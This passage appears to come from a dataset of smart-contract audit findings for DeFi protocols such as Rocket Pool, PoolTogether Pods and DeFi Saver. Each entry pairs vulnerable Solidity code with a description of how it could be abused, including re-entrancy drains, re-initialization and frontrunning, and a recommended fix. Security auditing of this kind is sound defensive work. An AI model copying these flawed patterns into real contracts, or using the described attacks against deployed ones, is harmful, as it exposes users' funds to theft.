= 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\n,Calculate `userAmount` as `msg.value - nodeAmount` instead. This should also save some gas.,,```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\n +RocketAuctionManager - calcBase should be declared constant,low,"Declaring the same constant value `calcBase` multiple times as local variables to some methods in `RocketAuctionManager` carries the risk that if that value is ever updated, one of the value assignments might be missed. It is therefore highly recommended to reduce duplicate code and declare the value as a public constant. This way, it is clear that the same `calcBase` is used throughout the contract, and there is a single point of change in case it ever needs to be changed.\\n```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n\\n```\\nfunction getLotClaimedRPLAmount(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotCurrentPrice(\\_index));\\n}\\n```\\n\\n```\\n// Calculation base value\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\nuint256 bidAmount = msg.value;\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\n// Calculate RPL claim amount\\nuint256 calcBase = 1 ether;\\nuint256 rplAmount = calcBase.mul(bidAmount).div(currentPrice);\\n```\\n","Consider declaring `calcBase` as a private const state var instead of re-declaring it with the same value in multiple, multiple functions. Constant, literal state vars are replaced in a preprocessing step and do not require significant additional gas when accessed than normal state vars.",,```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n +RocketDAO* - daoNamespace is missing a trailing dot; should be declared constant/immutable,low,"`string private daoNameSpace = 'dao.trustednodes'` is missing a trailing dot, or else there's no separator when concatenating the namespace with the vars.\\nrequests `dao.trustednodesmember.index` instead of `dao.trustednodes.member.index`\\n```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(""addressSetStorage""));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, ""member.index"")), \\_index);\\n}\\n```\\n\\n```\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// Calculate using this as the base\\nuint256 private calcBase = 1 ether;\\n\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// The namespace for any data stored in the network DAO (do not change)\\nstring private daoNameSpace = 'dao.protocol';\\n```\\n",Remove the `daoNameSpace` and add the prefix to the respective variables directly.,,"```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(""addressSetStorage""));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, ""member.index"")), \\_index);\\n}\\n```\\n" +RocketVault - consider rejecting zero amount deposit/withdrawal requests,low,"Consider disallowing zero amount token transfers unless the system requires this to work. In most cases, zero amount token transfers will emit an event (that potentially triggers off-chain components). In some cases, they allow the caller without holding any balance to call back to themselves (pot. reentrancy) or the caller provided token address.\\n`depositEther` allows to deposit zero ETH\\nemits `EtherDeposited`\\n`withdrawEther` allows to withdraw zero ETH\\ncalls back to `withdrawer` (msg.sender)!\\nemits `EtherWithdrawn`\\n(depositToken checks for amount >0)\\n`withdrawToken` allows zero amount token withdrawals\\ncalls into user provided (actually a network contract) tokenAddress)\\nemits `TokenWithdrawn`\\n`transferToken` allows zero amount token transfers\\nemits `TokenTransfer`\\n```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\n","Zero amount transfers are no-operation calls in most cases and should be avoided. However, as all vault actions are authenticated (to registered system contracts), the risk of something going wrong is rather low. Nevertheless, it is recommended to deny zero amount transfers to avoid running code unnecessarily (gas consumption), emitting unnecessary events, or potentially call back to callers/token address for ineffective transfers.",,"```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\n" +RocketVault - methods returning static return values and unchecked return parameters,low,"The `Token*` methods in `RocketVault` either throw or return `true`, but they can never return `false`. If the method fails, it will always throw. Therefore, it is questionable if the static return value is needed at all. Furthermore, callees are in most cases not checking the return value of\\nstatic return value `true`\\n```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\nemit TokenWithdrawn(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\n// Emit token withdrawn event\\nemit TokenTransfer(contractKeyFrom, contractKeyTo, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\nreturn value not checked\\n```\\nrocketVault.depositToken(""rocketNodeStaking"", rplTokenAddress, \\_amount);\\n// Update RPL stake amounts & node RPL staked block\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(""rocketTokenRPL""), rplAmount);\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(""rocketTokenRPL""), \\_amount);\\n```\\n\\n```\\nrocketVault.transferToken(""rocketAuctionManager"", getContractAddress(""rocketTokenRPL""), rplSlashAmount);\\n```\\n",Define a clear interface for these functions. Remove the static return value in favor of having the method throw on failure (which is already the current behavior).,,"```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n" +RocketMinipoolDelegate - enforce that the delegate contract cannot be called directly,low,"This contract is not meant to be consumed directly and will only be delegate called from `Minipool`. Being able to call it directly might even create the problem that, in the worst case, someone might be able to `selfdestruct` the contract rendering all other contracts that link to it dysfunctional. This might even not be easily detectable because `delegatecall` to an EOA will act as a NOP.\\nThe access control checks on the methods currently prevent methods from being called directly on the delegate. They require state variables to be set correctly, or the delegate is registered as a valid minipool in the system. Both conditions are improbable to be fulfilled, hence, mitigation any security risk. However, it looks like this is more of a side-effect than a design decision, and we would recommend not explicitly stating that the delegate contract cannot be used directly.\\n```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), ""Invalid storage address"");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n","Resolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by removing the constructor and therefore the initialization code from the RocketMinipoolDelegate contract. The contract cannot be used directly anymore as all relevant methods are decorated `onlyInitialised` and there is no way to initialize it in the implementation directly.\\nRemove the initialization from the constructor in the delegate contract. Consider adding a flag that indicates that the delegate contract is initialized and only set in the Minipool contract and not in the logic contract (delegate). On calls, check that the contract is initialized.",,"```\\nconstructor(address \\_rocketStorageAddress) {\\n // Initialise RocketStorage\\n require(\\_rocketStorageAddress != address(0x0), ""Invalid storage address"");\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n" +Re-entrancy issue for ERC1155,high,"ERC1155 tokens have callback functions on some of the transfers, like `safeTransferFrom`, `safeBatchTransferFrom`. During these transfers, the `IERC1155ReceiverUpgradeable(to).onERC1155Received` function is called in the `to` address.\\nFor example, `safeTransferFrom` is used in the `LiquidityMining` contract:\\n```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n ""2 weeks after liquidity mining time has not expired"");\\n require(!isNFTDistributed, ""NFT is already distributed"");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, """");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n\\nDuring that transfer, the `distributeAllNFT` function can be called again and again. So multiple transfers will be done for each user.\\nIn addition to that, any receiver of the tokens can revert the transfer. If that happens, nobody will be able to receive their tokens.",Add a reentrancy guard.\\nAvoid transferring tokens for different receivers in a single transaction.,,"```\\nfunction distributeAllNFT() external {\\n require(block.timestamp > getEndLMTime(),\\n ""2 weeks after liquidity mining time has not expired"");\\n require(!isNFTDistributed, ""NFT is already distributed"");\\n\\n for (uint256 i = 0; i < leaderboard.length; i++) {\\n address[] memory \\_groupLeaders = groupsLeaders[leaderboard[i]];\\n\\n for (uint256 j = 0; j < \\_groupLeaders.length; j++) {\\n \\_sendNFT(j, \\_groupLeaders[j]);\\n }\\n }\\n\\n for (uint256 i = 0; i < topUsers.length; i++) {\\n address \\_currentAddress = topUsers[i];\\n LMNFT.safeTransferFrom(address(this), \\_currentAddress, 1, 1, """");\\n emit NFTSent(\\_currentAddress, 1);\\n }\\n\\n isNFTDistributed = true;\\n}\\n```\\n" +Winning pods can be frontrun with large deposits,high,"`Pod.depositTo()` grants users shares of the pod pool in exchange for `tokenAmount` of `token`.\\n```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, ""Pod:invalid-amount"");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n\\nThe winner of a prize pool is typically determined by an off-chain random number generator, which requires a request to first be made on-chain. The result of this RNG request can be seen in the mempool and frontrun. In this case, an attacker could identify a winning `Pod` contract and make a large deposit, diluting existing user shares and claiming the entire prize.","The modifier `pauseDepositsDuringAwarding` is included in the `Pod` contract but is unused.\\n```\\nmodifier pauseDepositsDuringAwarding() {\\n require(\\n !IPrizeStrategyMinimal(\\_prizePool.prizeStrategy()).isRngRequested(),\\n ""Cannot deposit while prize is being awarded""\\n );\\n \\_;\\n}\\n```\\n\\nAdd this modifier to the `depositTo()` function along with corresponding test cases.",,"```\\nfunction depositTo(address to, uint256 tokenAmount)\\n external\\n override\\n returns (uint256)\\n{\\n require(tokenAmount > 0, ""Pod:invalid-amount"");\\n\\n // Allocate Shares from Deposit To Amount\\n uint256 shares = \\_deposit(to, tokenAmount);\\n\\n // Transfer Token Transfer Message Sender\\n IERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n );\\n\\n // Emit Deposited\\n emit Deposited(to, tokenAmount, shares);\\n\\n // Return Shares Minted\\n return shares;\\n}\\n```\\n" +TokenDrop: Unprotected initialize() function,high,"The `TokenDrop.initialize()` function is unprotected and can be called multiple times.\\n```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n\\nAmong other attacks, this would allow an attacker to re-initialize any `TokenDrop` with the same `asset` and a malicious `measure` token. By manipulating the balance of a user in this malicious `measure` token, the entire `asset` token balance of the `TokenDrop` contract could be drained.",Add the `initializer` modifier to the `initialize()` function and include an explicit test that every initialization function in the system can be called once and only once.,,"```\\nfunction initialize(address \\_measure, address \\_asset) external {\\n measure = IERC20Upgradeable(\\_measure);\\n asset = IERC20Upgradeable(\\_asset);\\n\\n // Set Factory Deployer\\n factory = msg.sender;\\n}\\n```\\n" +Pod: Re-entrancy during deposit or withdrawal can lead to stealing funds,high,"During the deposit, the token transfer is made after the Pod shares are minted:\\n```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n\\nThat means that if the `token` allows re-entrancy, the attacker can deposit one more time inside the `token` transfer. If that happens, the second call will mint more tokens than it is supposed to, because the first `token` transfer will still not be finished. By doing so with big amounts, it's possible to drain the pod.",Add re-entrancy guard to the external functions.,,"```\\nuint256 shares = \\_deposit(to, tokenAmount);\\n\\n// Transfer Token Transfer Message Sender\\nIERC20Upgradeable(token).transferFrom(\\n msg.sender,\\n address(this),\\n tokenAmount\\n);\\n```\\n" +TokenDrop: Re-entrancy in the claim function can cause to draining funds,high,"If the `asset` token is making a call before the `transfer` to the `receiver` or to any other 3-d party contract (like it's happening in the `Pod` token using the `_beforeTokenTransfer` function), the attacker can call the `drop` function inside the `transfer` call here:\\n```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n\\nBecause the `totalUnclaimed` is already changed, but the current balance is not, the `drop` function will consider the funds from the unfinished transfer as the new tokens. These tokens will be virtually redistributed to everyone.\\nAfter that, the transfer will still happen, and further calls of the `drop()` function will fail because the following line will revert:\\n`uint256 newTokens = assetTotalSupply.sub(totalUnclaimed);`\\nThat also means that any transfers of the `Pod` token will fail because they all are calling the `drop` function. The `TokenDrop` will “unfreeze” only if someone transfers enough tokens to the `TokenDrop` contract.\\nThe severity of this issue is hard to evaluate because, at the moment, there's not a lot of tokens that allow this kind of re-entrancy.","Simply adding re-entrancy guard to the `drop` and the `claim` function won't help because the `drop` function is called from the `claim`. For that, the transfer can be moved to a separate function, and this function can have the re-entrancy guard as well as the `drop` function.\\nAlso, it's better to make sure that `_beforeTokenTransfer` will not revert to prevent the token from being frozen.",,"```\\nfunction claim(address user) external returns (uint256) {\\n drop();\\n \\_captureNewTokensForUser(user);\\n uint256 balance = userStates[user].balance;\\n userStates[user].balance = 0;\\n totalUnclaimed = uint256(totalUnclaimed).sub(balance).toUint112();\\n\\n // Transfer asset/reward token to user\\n asset.transfer(user, balance);\\n\\n // Emit Claimed\\n emit Claimed(user, balance);\\n\\n return balance;\\n}\\n```\\n" +Pod: Having multiple token drops is inconsistent,medium,"The `Pod` contract had the `drop` storage field and mapping of different TokenDrops `(token => TokenDrop)`. When adding a new `TokenDrop` in the mapping, the `drop` field is also changed to the added _tokenDrop:\\n```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n ""Pod:unauthorized-set-token-drop""\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n ""Pod:target-tokendrop-mapping-exists""\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n\\nOn the other hand, the `measure` token and the `asset` token of the `drop` are strictly defined by the Pod contract. They cannot be changed, so all `TokenDrops` are supposed to have the same `asset` and `measure` tokens. So it is useless to have different `TokenDrops`.","The mapping seems to be unused, and only one `TokenDrop` will normally be in the system. If that code is not used, it should be deleted.",,"```\\nfunction setTokenDrop(address \\_token, address \\_tokenDrop)\\n external\\n returns (bool)\\n{\\n require(\\n msg.sender == factory || msg.sender == owner(),\\n ""Pod:unauthorized-set-token-drop""\\n );\\n\\n // Check if target<>tokenDrop mapping exists\\n require(\\n drops[\\_token] == TokenDrop(0),\\n ""Pod:target-tokendrop-mapping-exists""\\n );\\n\\n // Set TokenDrop Referance\\n drop = TokenDrop(\\_tokenDrop);\\n\\n // Set target<>tokenDrop mapping\\n drops[\\_token] = drop;\\n\\n return true;\\n}\\n```\\n" +Pod: Fees are not limited by a user during the withdrawal,medium,"When withdrawing from the Pod, the shares are burned, and the deposit is removed from the Pod. If there are not enough deposit tokens in the contract, the remaining tokens are withdrawn from the pool contract:\\n```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n\\nThese tokens are withdrawn with a fee from the pool, which is not controlled or limited by the user.",Allow users to pass a `maxFee` parameter to control fees.,,```\\nif (amount > currentBalance) {\\n // Calculate Withdrawl Amount\\n uint256 \\_withdraw = amount.sub(currentBalance);\\n\\n // Withdraw from Prize Pool\\n uint256 exitFee = \\_withdrawFromPool(\\_withdraw);\\n\\n // Add Exit Fee to Withdrawl Amount\\n amount = amount.sub(exitFee);\\n}\\n```\\n +Pod.setManager() checks validity of wrong address,low,"The function `Pod.setManager()` allows the `owner` of the Pod contract to change the Pod's `manager`. It checks that the value of the existing `manager` in storage is nonzero. This is presumably intended to ensure that the `owner` has provided a valid `newManager` parameter in calldata.\\nThe current check will always pass once the contract is initialized with a nonzero `manager`. But, the contract can currently be initialized with a `manager` of `IPodManager(address(0))`. In this case, the check would prevent the `manager` from ever being updated.\\n```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), ""Pod:invalid-manager-address"");\\n```\\n","Change the check to:\\n```\\nrequire(address(newManager) != address(0), ""Pod:invalid-manager-address"");\\n```\\n\\nMore generally, attempt to define validity criteria for all input values that are as strict as possible. Consider preventing zero inputs or inputs that might conflict with other addresses in the smart contract system altogether, including in contract initialization functions.",,"```\\nfunction setManager(IPodManager newManager)\\n public\\n virtual\\n onlyOwner\\n returns (bool)\\n{\\n // Require Valid Address\\n require(address(manager) != address(0), ""Pod:invalid-manager-address"");\\n```\\n" +Reuse of CHAINID from contract deployment,low,"The internal function `_validateWithdrawSignature()` is used to check whether a sponsored token withdrawal is approved by the owner of the stealth address that received the tokens. Among other data, the chain ID is signed over to prevent replay of signatures on other EVM-compatible chains.\\n```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n ""\\x19Ethereum Signed Message:\\n32"",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, ""Umbra: Invalid Signature"");\\n}\\n```\\n\\nHowever, this chain ID is set as an immutable value in the contract constructor. In the case of a future contentious hard fork of the Ethereum network, the same `Umbra` contract would exist on both of the resulting chains. One of these two chains would be expected to change the network's chain ID, but the `Umbra` contracts would not be aware of this change. As a result, signatures to the `Umbra` contract on either chain would be replayable on the other chain.\\nThis is a common pattern in contracts that implement EIP-712 signatures. Presumably, the motivation in most cases for committing to the chain ID at deployment time is to avoid recomputing the EIP-712 domain separator for every signature verification. In this case, the chain ID is a direct input to the generation of the signed digest, so this should not be a concern.","Replace the use of the `chainId` immutable value with the `CHAINID` opcode in `_validateWithdrawSignature()`. Note that `CHAINID` is only available using Solidity's inline assembly, so this would need to be accessed in the same way as it is currently accessed in the contract's constructor:\\n```\\nuint256 \\_chainId;\\n\\nassembly {\\n \\_chainId := chainid()\\n}\\n```\\n",,"```\\nfunction \\_validateWithdrawSignature(\\n address \\_stealthAddr,\\n address \\_acceptor,\\n address \\_tokenAddr,\\n address \\_sponsor,\\n uint256 \\_sponsorFee,\\n IUmbraHookReceiver \\_hook,\\n bytes memory \\_data,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n) internal view {\\n bytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n ""\\x19Ethereum Signed Message:\\n32"",\\n keccak256(abi.encode(chainId, version, \\_acceptor, \\_tokenAddr, \\_sponsor, \\_sponsorFee, address(\\_hook), \\_data))\\n )\\n );\\n\\n address \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\n require(\\_recoveredAddress != address(0) && \\_recoveredAddress == \\_stealthAddr, ""Umbra: Invalid Signature"");\\n}\\n```\\n" +Random task execution,high,"In a scenario where user takes a flash loan, `_parseFLAndExecute()` gives the flash loan wrapper contract (FLAaveV2, FLDyDx) the permission to execute functions on behalf of the user's `DSProxy`. This execution permission is revoked only after the entire recipe execution is finished, which means that in case that any of the external calls along the recipe execution is malicious, it might call `executeAction()` back and inject any task it wishes (e.g. take user's funds out, drain approved tokens, etc)\\n```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\n",A reentrancy guard (mutex) that covers the entire content of FLAaveV2.executeOperation/FLDyDx.callFunction should be used to prevent such attack.,,"```\\nfunction executeOperation(\\n address[] memory \\_assets,\\n uint256[] memory \\_amounts,\\n uint256[] memory \\_fees,\\n address \\_initiator,\\n bytes memory \\_params\\n) public returns (bool) {\\n require(msg.sender == AAVE\\_LENDING\\_POOL, ERR\\_ONLY\\_AAVE\\_CALLER);\\n require(\\_initiator == address(this), ERR\\_SAME\\_CALLER);\\n\\n (Task memory currTask, address proxy) = abi.decode(\\_params, (Task, address));\\n\\n // Send FL amounts to user proxy\\n for (uint256 i = 0; i < \\_assets.length; ++i) {\\n \\_assets[i].withdrawTokens(proxy, \\_amounts[i]);\\n }\\n\\n address payable taskExecutor = payable(registry.getAddr(TASK\\_EXECUTOR\\_ID));\\n\\n // call Action execution\\n IDSProxy(proxy).execute{value: address(this).balance}(\\n taskExecutor,\\n abi.encodeWithSelector(CALLBACK\\_SELECTOR, currTask, bytes32(\\_amounts[0] + \\_fees[0]))\\n );\\n\\n // return FL\\n for (uint256 i = 0; i < \\_assets.length; i++) {\\n \\_assets[i].approveToken(address(AAVE\\_LENDING\\_POOL), \\_amounts[i] + \\_fees[i]);\\n }\\n\\n return true;\\n}\\n```\\n" +Tokens with more than 18 decimal points will cause issues,high,"It is assumed that the maximum number of decimals for each token is 18. However uncommon, but it is possible to have tokens with more than 18 decimals, as an Example YAMv2 has 24 decimals. This can result in broken code flow and unpredictable outcomes (e.g. an underflow will result with really high rates).\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\n",Make sure the code won't fail in case the token's decimals is more than 18.,,"```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n```\\n" +"Error codes of Compound's Comptroller.enterMarket, Comptroller.exitMarket are not checked",high,"Compound's `enterMarket/exitMarket` functions return an error code instead of reverting in case of failure. DeFi Saver smart contracts never check for the error codes returned from Compound smart contracts, although the code flow might revert due to unavailability of the CTokens, however early on checks for Compound errors are suggested.\\n```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\n",Caller contract should revert in case the error code is not 0.,,```\\nfunction enterMarket(address \\_cTokenAddr) public {\\n address[] memory markets = new address[](1);\\n markets[0] = \\_cTokenAddr;\\n\\n IComptroller(COMPTROLLER\\_ADDR).enterMarkets(markets);\\n}\\n\\n/// @notice Exits the Compound market\\n/// @param \\_cTokenAddr CToken address of the token\\nfunction exitMarket(address \\_cTokenAddr) public {\\n IComptroller(COMPTROLLER\\_ADDR).exitMarket(\\_cTokenAddr);\\n}\\n```\\n +Reversed order of parameters in allowance function call,medium,"When trying to pull the maximum amount of tokens from an approver to the allowed spender, the parameters that are used for the `allowance` function call are not in the same order that is used later in the call to `safeTransferFrom`.\\n```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\n",Reverse the order of parameters in `allowance` function call to fit the order that is in the `safeTransferFrom` function call.,,"```\\nfunction pullTokens(\\n address \\_token,\\n address \\_from,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n // handle max uint amount\\n if (\\_amount == type(uint256).max) {\\n uint256 allowance = IERC20(\\_token).allowance(address(this), \\_from);\\n uint256 balance = getBalance(\\_token, \\_from);\\n\\n \\_amount = (balance > allowance) ? allowance : balance;\\n }\\n\\n if (\\_from != address(0) && \\_from != address(this) && \\_token != ETH\\_ADDR && \\_amount != 0) {\\n IERC20(\\_token).safeTransferFrom(\\_from, address(this), \\_amount);\\n }\\n\\n return \\_amount;\\n}\\n```\\n" +Kyber getRates code is unclear,low,"`getSellRate` can be converted into one function to get the rates, which then for buy or sell can swap input and output tokens\\n`getBuyRate` uses a 3% slippage that is not documented.\\n```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, 